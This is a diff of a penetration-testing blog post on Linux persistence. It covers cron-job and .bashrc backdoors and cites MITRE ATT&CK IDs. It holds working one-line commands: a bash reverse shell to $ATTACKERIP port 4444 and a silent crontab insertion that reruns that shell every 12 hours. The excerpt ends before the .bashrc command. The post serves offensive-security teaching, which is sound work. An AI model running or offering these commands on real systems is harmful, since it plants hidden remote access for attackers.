faisalfs10x/faisalfs10x.github.io/_posts/VAPT/2021-05-10-linux-persistence.md

 The crontab file contains a list of tasks that you wish to execute on a regular basis, as well as the name of the command that manages them.
 Crontab stands for "cron table," as it executes tasks using the cron job scheduler.

-The adversary can create a reverse shell that points to their C2 server using cron job upon reboot.
+The adversary can create a reverse shell that points to their C2 server using the cron job every 12th hour.
 Below is a simple example of bash reverse shell as for the PoC.

+Noted: `0 */12 * * *` means "At minute 0 past every 12th hour."

+Required: root or normal user privilege

 	$ Command:

-	root@victim$ echo "@reboot sleep 120 && /bin/bash -l > /dev/tcp/$ATTACKERIP/4444 0<&1 2>&1"
+	root@victim$ (crontab -l > .tab ; echo "0 */12 * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKERIP/4444 0>&1'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1

 ## Creating .bashrc backdoor

 [MITRE ID: T1546.004](https://attack.mitre.org/techniques/T1546/004/)

 A bashrc file is a shell script file that Linux uses when starting up to load items like modules and aliases into a user's profile.
 So, whenever an interactive session is launched, the .bashrc file will load the reverse shell pointing to the adversary C2 server.

+Required: root or normal user privilege

 	$ Command: